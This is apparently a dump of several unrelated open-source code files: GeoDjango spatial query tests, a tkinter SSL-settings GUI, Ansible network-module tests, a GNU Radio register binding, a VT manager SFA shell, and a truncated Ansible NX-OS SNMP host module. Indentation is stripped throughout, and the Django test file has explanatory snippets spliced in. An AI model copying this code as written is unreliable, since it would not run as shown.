Feature(name='GeometryCollection',
geom=GeometryCollection(Point(2, 2), LineString((0, 0), (2, 2)),
Polygon(LinearRing((0, 0), (0, 5), (5, 5), (5, 0), (0, 0))))).save()
f_1 = Feature.objects.get(name='Point')
self.assertEqual(True, isinstance(f_1.geom, Point))
self.assertEqual((1.0, 1.0), f_1.geom.tuple)
f_2 = Feature.objects.get(name='LineString')
self.assertEqual(True, isinstance(f_2.geom, LineString))
self.assertEqual(((0.0, 0.0), (1.0, 1.0), (5.0, 5.0)), f_2.geom.tuple)
f_3 = Feature.objects.get(name='Polygon')
self.assertEqual(True, isinstance(f_3.geom, Polygon))
f_4 = Feature.objects.get(name='GeometryCollection')
self.assertEqual(True, isinstance(f_4.geom, GeometryCollection))
self.assertEqual(f_3.geom, f_4.geom[2])
@no_mysql
def test19_centroid(self):
"Testing the `centroid` GeoQuerySet method."
qs = State.objects.exclude(poly__isnull=True).centroid()
if oracle:
tol = 0.1
elif spatialite:
tol = 0.000001
else:
tol = 0.000000001
for s in qs:
self.assertEqual(True, s.poly.centroid.equals_exact(s.centroid, tol))
@no_mysql
def test20_pointonsurface(self):
"Testing the `point_on_surface` GeoQuerySet method."
# Reference values.
if oracle:
# SELECT SDO_UTIL.TO_WKTGEOMETRY(SDO_GEOM.SDO_POINTONSURFACE(GEOAPP_COUNTRY.MPOLY, 0.05)) FROM GEOAPP_COUNTRY;
ref = {'New Zealand' : fromstr('POINT (174.616364 -36.100861)', srid=4326),
'Texas' : fromstr('POINT (-103.002434 36.500397)', srid=4326),
}
elif postgis or spatialite:
# Using GEOSGeometry to compute the reference point on surface values
# -- since PostGIS also uses GEOS these should be the same.
ref = {'New Zealand' : Country.objects.get(name='New Zealand').mpoly.point_on_surface,
'Texas' : Country.objects.get(name='Texas').mpoly.point_on_surface
}
for c in Country.objects.point_on_surface():
if spatialite:
# XXX This seems to be a WKT-translation-related precision issue?
tol = 0.00001
else:
tol = 0.000000001
self.assertEqual(True, ref[c.name].equals_exact(c.point_on_surface, tol))
@no_mysql
@no_oracle
def test21_scale(self):
"Testing the `scale` GeoQuerySet method."
xfac, yfac = 2, 3
tol = 5 # XXX The low precision tolerance is for SpatiaLite
qs = Country.objects.scale(xfac, yfac, model_att='scaled')
for c in qs:
for p1, p2 in zip(c.mpoly, c.scaled):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
self.assertAlmostEqual(c1[0] * xfac, c2[0], tol)
self.assertAlmostEqual(c1[1] * yfac, c2[1], tol)
@no_mysql
@no_oracle
def test22_translate(self):
"Testing the `translate` GeoQuerySet method."
xfac, yfac = 5, -23
qs = Country.objects.translate(xfac, yfac, model_att='translated')
for c in qs:
for p1, p2 in zip(c.mpoly, c.translated):
for r1, r2 in zip(p1, p2):
for c1, c2 in zip(r1.coords, r2.coords):
# XXX The low precision is for SpatiaLite
self.assertAlmostEqual(c1[0] + xfac, c2[0], 5)
self.assertAlmostEqual(c1[1] + yfac, c2[1], 5)
@no_mysql
def test23_numgeom(self):
"Testing the `num_geom` GeoQuerySet method."
# Both 'countries' only have two geometries.
for c in Country.objects.num_geom(): self.assertEqual(2, c.num_geom)
for c in City.objects.filter(point__isnull=False).num_geom():
# Oracle will return 1 for the number of geometries on non-collections,
# whereas PostGIS will return None.
if postgis:
self.assertEqual(None, c.num_geom)
else:
self.assertEqual(1, c.num_geom)
@no_mysql
@no_spatialite # SpatiaLite can only count vertices in LineStrings
def test24_numpoints(self):
"Testing the `num_points` GeoQuerySet method."
for c in Country.objects.num_points():
self.assertEqual(c.mpoly.num_points, c.num_points)
if not oracle:
# Oracle cannot count vertices in Point geometries.
for c in City.objects.num_points(): self.assertEqual(1, c.num_points)
@no_mysql
def test25_geoset(self):
"Testing the `difference`, `intersection`, `sym_difference`, and `union` GeoQuerySet methods."
geom = Point(5, 23)
tol = 1
qs = Country.objects.all().difference(geom).sym_difference(geom).union(geom)
# XXX For some reason SpatiaLite does something screwy with the Texas geometry here. Also,
# XXX it doesn't like the null intersection.
if spatialite:
qs = qs.exclude(name='Texas')
else:
qs = qs.intersection(geom)
for c in qs:
if oracle:
# Should be able to execute the queries; however, they won't be the same
# as GEOS (because Oracle doesn't use GEOS internally like PostGIS or
# SpatiaLite).
pass
else:
self.assertEqual(c.mpoly.difference(geom), c.difference)
if not spatialite:
self.assertEqual(c.mpoly.intersection(geom), c.intersection)
self.assertEqual(c.mpoly.sym_difference(geom), c.sym_difference)
self.assertEqual(c.mpoly.union(geom), c.union)
@no_mysql
def test26_inherited_geofields(self):
"Test GeoQuerySet methods on inherited Geometry fields."
# Creating a Pennsylvanian city.
mansfield = PennsylvaniaCity.objects.create(name='Mansfield', county='Tioga', point='POINT(-77.071445 41.823881)')
# All transformation SQL will need to be performed on the
# _parent_ table.
qs = PennsylvaniaCity.objects.transform(32128)
self.assertEqual(1, qs.count())
for pc in qs: self.assertEqual(32128, pc.point.srid)
@no_mysql
@no_oracle
@no_spatialite
def test27_snap_to_grid(self):
"Testing GeoQuerySet.snap_to_grid()."
# Let's try and break snap_to_grid() with bad combinations of arguments.
for bad_args in ((), range(3), range(5)):
self.assertRaises(ValueError, Country.objects.snap_to_grid, *bad_args)
for bad_args in (('1.0',), (1.0, None), tuple(map(unicode, range(4)))):
self.assertRaises(TypeError, Country.objects.snap_to_grid, *bad_args)
# Boundary for San Marino, courtesy of Bjorn Sandvik of thematicmapping.org
# from the world borders dataset he provides.
wkt = ('MULTIPOLYGON(((12.41580 43.95795,12.45055 43.97972,12.45389 43.98167,'
'12.46250 43.98472,12.47167 43.98694,12.49278 43.98917,'
'12.50555 43.98861,12.51000 43.98694,12.51028 43.98277,'
'12.51167 43.94333,12.51056 43.93916,12.49639 43.92333,'
'12.49500 43.91472,12.48778 43.90583,12.47444 43.89722,'
'12.46472 43.89555,12.45917 43.89611,12.41639 43.90472,'
'12.41222 43.90610,12.40782 43.91366,12.40389 43.92667,'
'12.40500 43.94833,12.40889 43.95499,12.41580 43.95795)))')
sm = Country.objects.create(name='San Marino', mpoly=fromstr(wkt))
# Because floating-point arithmetic isn't exact, we set a tolerance
# to pass into GEOS `equals_exact`.
tol = 0.000000001
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.1)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 44,12.5 44,12.5 43.9,12.4 43.9,12.4 44)))')
self.assertTrue(ref.equals_exact(Country.objects.snap_to_grid(0.1).get(name='San Marino').snap_to_grid, tol))
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.05, 0.23)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.93,12.45 43.93,12.5 43.93,12.45 43.93,12.4 43.93)))')
self.assertTrue(ref.equals_exact(Country.objects.snap_to_grid(0.05, 0.23).get(name='San Marino').snap_to_grid, tol))
# SELECT AsText(ST_SnapToGrid("geoapp_country"."mpoly", 0.5, 0.17, 0.05, 0.23)) FROM "geoapp_country" WHERE "geoapp_country"."name" = 'San Marino';
ref = fromstr('MULTIPOLYGON(((12.4 43.87,12.45 43.87,12.45 44.1,12.5 44.1,12.5 43.87,12.45 43.87,12.4 43.87)))')
self.assertTrue(ref.equals_exact(Country.objects.snap_to_grid(0.05, 0.23, 0.5, 0.17).get(name='San Marino').snap_to_grid, tol))
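`ST_SnapToGrid` rounds each coordinate to the nearest grid intersection: `x' = originX + round((x - originX) / sizeX) * sizeX`, and likewise for y. A one-coordinate sketch of that formula (illustrative, not the PostGIS source), checked against the reference values above:

```python
def snap(value, size, origin=0.0):
    """Snap a single coordinate to a grid of the given cell size and origin."""
    return origin + round((value - origin) / size) * size
```

For example, snapping the first San Marino x value (12.41580) to a 0.1 grid gives 12.4, matching the first reference multipolygon.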
@no_mysql
@no_spatialite
def test28_reverse(self):
"Testing GeoQuerySet.reverse_geom()."
coords = [ (-95.363151, 29.763374), (-95.448601, 29.713803) ]
Track.objects.create(name='Foo', line=LineString(coords))
t = Track.objects.reverse_geom().get(name='Foo')
coords.reverse()
self.assertEqual(tuple(coords), t.reverse_geom.coords)
if oracle:
self.assertRaises(TypeError, State.objects.reverse_geom)
@no_mysql
@no_oracle
@no_spatialite
def test29_force_rhr(self):
"Testing GeoQuerySet.force_rhr()."
rings = ( ( (0, 0), (5, 0), (0, 5), (0, 0) ),
( (1, 1), (1, 3), (3, 1), (1, 1) ),
)
rhr_rings = ( ( (0, 0), (0, 5), (5, 0), (0, 0) ),
( (1, 1), (3, 1), (1, 3), (1, 1) ),
)
State.objects.create(name='Foo', poly=Polygon(*rings))
s = State.objects.force_rhr().get(name='Foo')
self.assertEqual(rhr_rings, s.force_rhr.coords)
@no_mysql
@no_oracle
@no_spatialite
def test30_geohash(self):
"Testing GeoQuerySet.geohash()."
if not connection.ops.geohash: return
# Reference query:
# SELECT ST_GeoHash(point) FROM geoapp_city WHERE name='Houston';
# SELECT ST_GeoHash(point, 5) FROM geoapp_city WHERE name='Houston';
ref_hash = '9vk1mfq8jx0c8e0386z6'
h1 = City.objects.geohash().get(name='Houston')
h2 = City.objects.geohash(precision=5).get(name='Houston')
self.assertEqual(ref_hash, h1.geohash)
self.assertEqual(ref_hash[:5], h2.geohash)
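For context, `ST_GeoHash` implements the standard geohash scheme: alternately bisect the longitude and latitude ranges, collect one bit per bisection, and emit the bits five at a time through a base-32 alphabet. A from-scratch sketch (not the PostGIS implementation) reproduces the Houston prefix used above:

```python
_BASE32 = "0123456789bcdefghjkmnpqrstuvwxyz"

def geohash(lon, lat, precision=12):
    lon_lo, lon_hi = -180.0, 180.0
    lat_lo, lat_hi = -90.0, 90.0
    bits, even = [], True  # the first bit comes from longitude
    while len(bits) < precision * 5:
        if even:
            mid = (lon_lo + lon_hi) / 2
            if lon >= mid:
                bits.append(1)
                lon_lo = mid
            else:
                bits.append(0)
                lon_hi = mid
        else:
            mid = (lat_lo + lat_hi) / 2
            if lat >= mid:
                bits.append(1)
                lat_lo = mid
            else:
                bits.append(0)
                lat_hi = mid
        even = not even
    out = []
    for i in range(0, len(bits), 5):
        idx = 0
        for b in bits[i:i + 5]:
            idx = (idx << 1) | b  # pack five bits into one base-32 digit
        out.append(_BASE32[idx])
    return ''.join(out)
```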
from test_feeds import GeoFeedTest
from test_regress import GeoRegressionTests
from test_sitemaps import GeoSitemapTest
def suite():
s = unittest.TestSuite()
s.addTest(unittest.makeSuite(GeoModelTest))
s.addTest(unittest.makeSuite(GeoFeedTest))
s.addTest(unittest.makeSuite(GeoSitemapTest))
s.addTest(unittest.makeSuite(GeoRegressionTests))
return s
| bsd-3-clause |
operant/knowledge-management | Server/settings_gui.py | 2 | 6175 | import tkinter as tk
from tkinter import filedialog
from tkinter import *
from tkinter import TOP, E
from Server import home_gui
class SettingsPage(tk.Frame):
def __init__(self, frame, gui):
# parameter: frame
# parameter: gui
"""
Init the frame.
"""
tk.Frame.__init__(self, frame)
"""
Creates a Label to display 'Server Settings'.
"""
label = tk.Label(self, text="Server Settings")
label.pack(side=TOP)
# Frame used for organization
top = tk.Frame(self)
top.pack(side=TOP)
# Frame used for organization
bottom = tk.Frame(self)
bottom.pack(side=BOTTOM)
# http://effbot.org/tkinterbook/radiobutton.htm
certModeText = tk.Label(top, text="SSL Certificate Mode")
certModeText.grid(row=0, sticky=N)
certModes = [
("Automatic Let's Encrypt Certificate", 1),
("Manually Selected Certificate:", 2),
("Self-Signed Certificate (WARNING: INSECURE)", 3)
]
gui.selectedCertMode = IntVar()
gui.selectedCertMode.set(1)
for title, val in certModes:
Radiobutton(self,
text=title,
padx=10,
variable=gui.selectedCertMode,
command=lambda: self.certModeChanged(gui),
value=val).pack(side=TOP, anchor=W)
'''
"""
Creates a Label to display 'Certificate File'.
"""
filenameText = tk.Label(top, text="Certificate File")
filenameText.grid(row=2, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the name of the file.
"""
self.filenameInput = tk.Entry(top)
self.filenameInput.grid(row=2, column=1)
"""
Creates a Label to display 'Private Key File'.
"""
categoryText = tk.Label(top, text="Private Key File")
categoryText.grid(row=3, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the category of the file.
"""
self.categoryInput = tk.Entry(top)
self.categoryInput.grid(row=3, column=1)
"""
Creates and adds a select private key file button.
Opens a file-browser window which only accepts a .key file.
"""
uploadButton = tk.Button(bottom, text="Upload",
command=lambda: self.upload(gui,
self.filenameInput.get(),
self.categoryInput.get(),
self.keywordsInput.get()))
uploadButton.grid(row=0)
"""
Creates a Label to display 'Certificate Server Hostname'.
"""
keywordsText = tk.Label(top, text="Certificate Server Hostname")
keywordsText.grid(row=4, sticky=E)
"""
Creates a Entry to display a textbox for the client to enter the keywords of the file.
"""
self.keywordsInput = tk.Entry(top)
self.keywordsInput.grid(row=4, column=1)
"""
Creates and adds a upload button.
Takes all text the client enters and
uploads the file with the corresponding information.
"""
uploadButton = tk.Button(bottom, text="Upload",
command=lambda: self.manually_set_keyfile(gui))
uploadButton.grid(row=0)'''
"""
Creates and adds a back button.
Takes the client back to menu page when clicked on.
"""
backButton = tk.Button(bottom, text="Cancel",
command=lambda: self.back(gui))
backButton.grid(row=2)
def certModeChanged(self, gui):
# Add code in here which enables and disables certain fields
# based upon the selection.
gui.selectedCertMode
if (gui.selectedCertMode.get() == 3):
# Put in fields for Self Signed Certificate
print("IMPLEMENT CERT SETTINGS FOR SELF SIGNED CERTS")
elif (gui.selectedCertMode.get() == 2):
# Put in fields for Manually Selected Certificate
print("IMPLEMENT CERT SETTINGS FOR MANUAL FIELDS")
elif (gui.selectedCertMode.get() == 1):
# Put in fields for Automatic Let's Encrypt Certificate
print("IMPLEMENT CERT SETTINGS FOR AUTOMATIC FIELDS")
def manually_set_certfile(self, gui):
# Open a file window which allows you to select only a '.crt' file and bind the value to the main gui object
gui.certFilename = filedialog.askopenfilename(initialdir="/", title="Select Certificate File",
filetypes=[('Certificate', '.crt')])
def manually_set_keyfile(self, gui):
# Open a file window which allows you to select only a '.key' file and bind the value to the main gui object
gui.keyFilename = filedialog.askopenfilename(initialdir="/", title="Select Private Key File",
filetypes=[('Private Key', '.key')])
def apply_settings(self, gui, filename, category, keywords):
# TODO: Change to use the above methods for setting the keyfiles.
# TODO: Also needs to eventually allow for LE certs and self-signed.
gui.keyFilename = filedialog.askopenfilename(initialdir="/", title="Select file")
print(gui.keyFilename)
self.filenameInput.insert(0, gui.keyFilename)
response = gui.getClient().upload(filename, category, keywords)
"""
Goes back to the home page.
"""
gui.show_frame(home_gui.HomePage)
# self.filenameInput.delete(0, 'end')
# self.categoryInput.delete(0, 'end')
# self.keywordsInput.delete(0, 'end')
def back(self, gui):
# parameter: gui -> The GUI that is being used.
"""
Goes back to the starting page.
"""
gui.show_frame(home_gui.HomePage)
| mit |
pilou-/ansible | test/units/modules/network/netvisor/test_pn_cpu_class.py | 15 | 2855 | # Copyright: (c) 2018, Pluribus Networks
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from units.compat.mock import patch
from ansible.modules.network.netvisor import pn_cpu_class
from units.modules.utils import set_module_args
from .nvos_module import TestNvosModule, load_fixture
class TestCpuClassModule(TestNvosModule):
module = pn_cpu_class
def setUp(self):
self.mock_run_nvos_commands = patch('ansible.modules.network.netvisor.pn_cpu_class.run_cli')
self.run_nvos_commands = self.mock_run_nvos_commands.start()
self.mock_run_check_cli = patch('ansible.modules.network.netvisor.pn_cpu_class.check_cli')
self.run_check_cli = self.mock_run_check_cli.start()
def tearDown(self):
self.mock_run_nvos_commands.stop()
def run_cli_patch(self, module, cli, state_map):
if state_map['present'] == 'cpu-class-create':
results = dict(
changed=True,
cli_cmd=cli
)
elif state_map['absent'] == 'cpu-class-delete':
results = dict(
changed=True,
cli_cmd=cli
)
module.exit_json(**results)
def load_fixtures(self, commands=None, state=None, transport='cli'):
self.run_nvos_commands.side_effect = self.run_cli_patch
if state == 'present':
self.run_check_cli.return_value = False
if state == 'absent':
self.run_check_cli.return_value = True
if state == 'update':
self.run_check_cli.return_value = True
def test_cpu_class_create(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'pn_scope': 'local', 'pn_rate_limit': '1000', 'state': 'present'})
result = self.execute_module(changed=True, state='present')
expected_cmd = ' switch sw01 cpu-class-create name icmp scope local rate-limit 1000 '
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_cpu_class_delete(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'state': 'absent'})
result = self.execute_module(changed=True, state='absent')
expected_cmd = ' switch sw01 cpu-class-delete name icmp '
self.assertEqual(result['cli_cmd'], expected_cmd)
def test_cpu_class_update(self):
set_module_args({'pn_cliswitch': 'sw01', 'pn_name': 'icmp',
'pn_rate_limit': '2000', 'state': 'update'})
        result = self.execute_module(changed=True, state='update')
expected_cmd = ' switch sw01 cpu-class-modify name icmp rate-limit 2000 '
self.assertEqual(result['cli_cmd'], expected_cmd)
| gpl-3.0 |
GREO/GNU-Radio | usrp/host/swig/usrp_fpga_regs.py | 11 | 1182 | #
# Copyright 2005 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from usrpm import usrp_prims
# Copy everything that starts with FR_ or bmFR_ from the usrp_prims
# name space into our name space. This is effectively a python binding for
# the contents of firmware/include/fpga_regs_common.h and fpga_regs_standard.h
for name in dir(usrp_prims):
if name.startswith("FR_") or name.startswith("bmFR_"):
globals()[name] = usrp_prims.__dict__[name]
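
The loop above copies every `FR_`/`bmFR_` name from `usrp_prims` into the module's own namespace. A minimal standalone sketch of the same idiom, using the stdlib `stat` module (and its `ST_*` constants) in place of `usrp_prims`, since the USRP bindings are not assumed to be installed:

```python
# Sketch of the name-copying idiom above, using the stdlib `stat` module
# and its ST_* constants as a stand-in for usrp_prims and FR_/bmFR_.
import stat

def copy_prefixed_names(source_module, prefixes, namespace):
    """Copy every attribute whose name starts with one of `prefixes`
    from `source_module` into the given `namespace` dict."""
    for name in dir(source_module):
        if name.startswith(prefixes):
            namespace[name] = getattr(source_module, name)
    return namespace

ns = copy_prefixed_names(stat, ("ST_",), {})
```

In the original file the target namespace is `globals()` itself, which makes the copied constants importable from the wrapper module.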
| gpl-3.0 |
avlach/univbris-ocf | vt_manager/src/python/vt_manager/communication/sfa/drivers/VTShell.py | 1 | 3868 | from vt_manager.models.VirtualMachine import VirtualMachine
from vt_manager.models.VTServer import VTServer
from vt_manager.models.Action import Action
from vt_manager.models.expiring_components import ExpiringComponents
from vt_manager.communication.sfa.util.xrn import Xrn, hrn_to_urn, get_leaf
from vt_manager.controller.drivers.VTDriver import VTDriver
from vt_manager.communication.sfa.vm_utils.VMSfaManager import VMSfaManager
from vt_manager.communication.sfa.vm_utils.SfaCommunicator import SfaCommunicator
from vt_manager.utils.ServiceThread import ServiceThread
import threading
import time
from vt_manager.controller.dispatchers.xmlrpc.ProvisioningDispatcher import ProvisioningDispatcher
from vt_manager.utils.UrlUtils import UrlUtils
#XXX: Implement SfaCommunicator to make better use of SFA CreateSliver and Start/Stop/Delete/Update slice operations
#from vt_manager.common.middleware.thread_local import thread_locals, push
#from multiprocessing import Pipe
class VTShell:
def __init__(self):
pass
def GetNodes(self,slice=None,authority=None,uuid=None):
servers = VTServer.objects.all()
if uuid:
for server in servers:
if str(server.uuid) == str(uuid):
return server
return None
if not slice:
return servers
else:
slice_servers = list()
for server in servers:
vms = server.getChildObject().getVMs(sliceName=slice, projectName = authority)
if vms:
slice_servers.append(server)
return slice_servers
def GetSlice(self,slicename,authority):
name = slicename # or uuid...
servers = self.GetNodes()
slices = dict()
List = list()
for server in servers:
child_server = server.getChildObject()
vms = child_server.getVMs(sliceName=name, projectName = authority)
for vm in vms:
List.append({'vm-name':vm.name,'vm-state':vm.state,'vm-id':vm.id, 'node-id':server.uuid, 'node-name':server.name})
slices['vms'] = List
return slices
def StartSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_START_TYPE)
def StopSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_STOP_TYPE)
def RebootSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_REBOOT_TYPE)
def DeleteSlice(self,server_uuid,vm_id):
return self.__crudVM(server_uuid,vm_id,Action.PROVISIONING_VM_DELETE_TYPE)
def __crudVM(self,server_uuid,vm_id,action):
try:
VTDriver.PropagateActionToProvisioningDispatcher(vm_id, server_uuid, action)
except Exception as e:
raise e
return 1
def CreateSliver(self,vm_params,projectName,sliceName,expiration):
#processes = list()
provisioningRSpecs = VMSfaManager.getActionInstance(vm_params,projectName,sliceName)
for provisioningRSpec in provisioningRSpecs:
#waiter,event = Pipe()
#process = SfaCommunicator(provisioningRSpec.action[0].id,event,provisioningRSpec)
#processes.append(process)
#process.start()
ServiceThread.startMethodInNewThread(ProvisioningDispatcher.processProvisioning,provisioningRSpec,'SFA.OCF.VTM') #UrlUtils.getOwnCallbackURL())
if expiration:
ExpiringComponents.objects.create(slice=sliceName, authority=projectName, expires=expiration).save()
#waiter.recv()
return 1
def GetSlices(self, server_id, user=None):
#TODO: Get all the vms from a node and from an specific user
pass
def convert_to_uuid(self,requested_attributes):
for slivers in requested_attributes:
servers = VTServer.objects.filter(name=get_leaf(slivers['component_id']))
slivers['component_id'] = servers[0].uuid
return requested_attributes
| bsd-3-clause |
valentin-krasontovitsch/ansible | lib/ansible/modules/network/nxos/nxos_snmp_host.py | 68 | 15264 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_host
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP host configuration.
description:
- Manages SNMP host configuration parameters.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
- C(state=absent) removes the host configuration if it is configured.
options:
snmp_host:
description:
        - IP address or hostname of target host.
required: true
version:
description:
- SNMP version. If this is not specified, v1 is used.
choices: ['v1', 'v2c', 'v3']
v3:
description:
        - Use this when version is v3. SNMPv3 security level.
choices: ['noauth', 'auth', 'priv']
community:
description:
- Community string or v3 username.
udp:
description:
- UDP port number (0-65535).
default: 162
snmp_type:
description:
- type of message to send to host. If this is not
specified, trap type is used.
choices: ['trap', 'inform']
vrf:
description:
- VRF to use to source traffic to source.
If state = absent, the vrf is removed.
vrf_filter:
description:
- Name of VRF to filter.
If state = absent, the vrf is removed from the filter.
src_intf:
description:
- Source interface. Must be fully qualified interface name.
If state = absent, the interface is removed.
state:
description:
- Manage the state of the resource. If state = present, the
host is added to the configuration. If only vrf and/or
vrf_filter and/or src_intf are given, they will be added to
the existing host configuration. If state = absent, the
host is removed if community parameter is given. It is possible
to remove only vrf and/or src_int and/or vrf_filter
by providing only those parameters and no community parameter.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure snmp host is configured
- nxos_snmp_host:
snmp_host: 192.0.2.3
community: TESTING
state: present
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["snmp-server host 192.0.2.3 filter-vrf another_test_vrf"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
command = {
'command': command,
'output': 'json',
}
return run_commands(module, command)
def apply_key_map(key_map, table):
new_dict = {}
for key, value in table.items():
new_key = key_map.get(key)
if new_key:
value = table.get(key)
if value:
new_dict[new_key] = str(value)
else:
new_dict[new_key] = value
return new_dict
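
`apply_key_map` renames dictionary keys according to a mapping and stringifies truthy values while passing falsy ones through unchanged. A self-contained restatement of that behavior (duplicated here so it runs without the Ansible harness; the sample `host_map`/`row` data is illustrative):

```python
# Standalone restatement of apply_key_map, mirroring the function above:
# keys are renamed via key_map, truthy values are stringified, falsy values
# pass through as-is, and unmapped keys are dropped.
def apply_key_map(key_map, table):
    new_dict = {}
    for key, value in table.items():
        new_key = key_map.get(key)
        if new_key:
            if value:
                new_dict[new_key] = str(value)   # truthy -> stringified
            else:
                new_dict[new_key] = value        # falsy -> unchanged
    return new_dict

host_map = {'port': 'udp', 'version': 'version', 'secname': 'community'}
row = {'port': 162, 'version': 'v2c', 'secname': 'public', 'ignored': 'x'}
mapped = apply_key_map(host_map, row)
```

This is how the module normalizes the JSON rows returned by `show snmp host` before comparing them to the proposed parameters.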
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_snmp_host(host, udp, module):
body = execute_show_command('show snmp host', module)
host_map = {
'port': 'udp',
'version': 'version',
'level': 'v3',
'type': 'snmp_type',
'secname': 'community'
}
host_map_5k = {
'port': 'udp',
'version': 'version',
'sec_level': 'v3',
'notif_type': 'snmp_type',
'commun_or_user': 'community'
}
resource = {}
if body:
try:
resource_table = body[0]['TABLE_host']['ROW_host']
if isinstance(resource_table, dict):
resource_table = [resource_table]
for each in resource_table:
key = str(each['host']) + '_' + str(each['port']).strip()
src = each.get('src_intf')
host_resource = apply_key_map(host_map, each)
if src:
host_resource['src_intf'] = src
if re.search(r'interface:', src):
host_resource['src_intf'] = src.split(':')[1].strip()
vrf_filt = each.get('TABLE_vrf_filters')
if vrf_filt:
vrf_filter = vrf_filt['ROW_vrf_filters']['vrf_filter'].split(':')[1].split(',')
filters = [vrf.strip() for vrf in vrf_filter]
host_resource['vrf_filter'] = filters
vrf = each.get('vrf')
if vrf:
host_resource['vrf'] = vrf.split(':')[1].strip()
resource[key] = host_resource
except KeyError:
# Handle the 5K case
try:
resource_table = body[0]['TABLE_hosts']['ROW_hosts']
if isinstance(resource_table, dict):
resource_table = [resource_table]
for each in resource_table:
key = str(each['address']) + '_' + str(each['port']).strip()
src = each.get('src_intf')
host_resource = apply_key_map(host_map_5k, each)
if src:
host_resource['src_intf'] = src
if re.search(r'interface:', src):
host_resource['src_intf'] = src.split(':')[1].strip()
vrf = each.get('use_vrf_name')
if vrf:
host_resource['vrf'] = vrf.strip()
vrf_filt = each.get('TABLE_filter_vrf')
if vrf_filt:
vrf_filter = vrf_filt['ROW_filter_vrf']['filter_vrf_name'].split(',')
filters = [vrf.strip() for vrf in vrf_filter]
host_resource['vrf_filter'] = filters
resource[key] = host_resource
except (KeyError, AttributeError, TypeError):
return resource
except (AttributeError, TypeError):
return resource
find = resource.get(host + '_' + udp)
if find:
fix_find = {}
for (key, value) in find.items():
if isinstance(value, str):
fix_find[key] = value.strip()
else:
fix_find[key] = value
return fix_find
return {}
def remove_snmp_host(host, udp, existing):
    commands = []
    command = None
    if existing['version'] == 'v3':
existing['version'] = '3'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {v3} {community} udp-port {1}'.format(host, udp, **existing)
elif existing['version'] == 'v2c':
existing['version'] = '2c'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {community} udp-port {1}'.format(host, udp, **existing)
elif existing['version'] == 'v1':
existing['version'] = '1'
command = 'no snmp-server host {0} {snmp_type} version \
{version} {community} udp-port {1}'.format(host, udp, **existing)
if command:
commands.append(command)
return commands
def remove_vrf(host, udp, proposed, existing):
commands = []
if existing.get('vrf'):
commands.append('no snmp-server host {0} use-vrf \
{1} udp-port {2}'.format(host, proposed.get('vrf'), udp))
return commands
def remove_filter(host, udp, proposed, existing):
commands = []
if existing.get('vrf_filter'):
if proposed.get('vrf_filter') in existing.get('vrf_filter'):
commands.append('no snmp-server host {0} filter-vrf \
{1} udp-port {2}'.format(host, proposed.get('vrf_filter'), udp))
return commands
def remove_src(host, udp, proposed, existing):
commands = []
if existing.get('src_intf'):
commands.append('no snmp-server host {0} source-interface \
{1} udp-port {2}'.format(host, proposed.get('src_intf'), udp))
return commands
def config_snmp_host(delta, udp, proposed, existing, module):
commands = []
command_builder = []
host = proposed['snmp_host']
cmd = 'snmp-server host {0}'.format(proposed['snmp_host'])
snmp_type = delta.get('snmp_type')
version = delta.get('version')
ver = delta.get('v3')
community = delta.get('community')
command_builder.append(cmd)
if any([snmp_type, version, ver, community]):
type_string = snmp_type or existing.get('type')
if type_string:
command_builder.append(type_string)
version = version or existing.get('version')
if version:
if version == 'v1':
vn = '1'
elif version == 'v2c':
vn = '2c'
elif version == 'v3':
vn = '3'
version_string = 'version {0}'.format(vn)
command_builder.append(version_string)
if ver:
ver_string = ver or existing.get('v3')
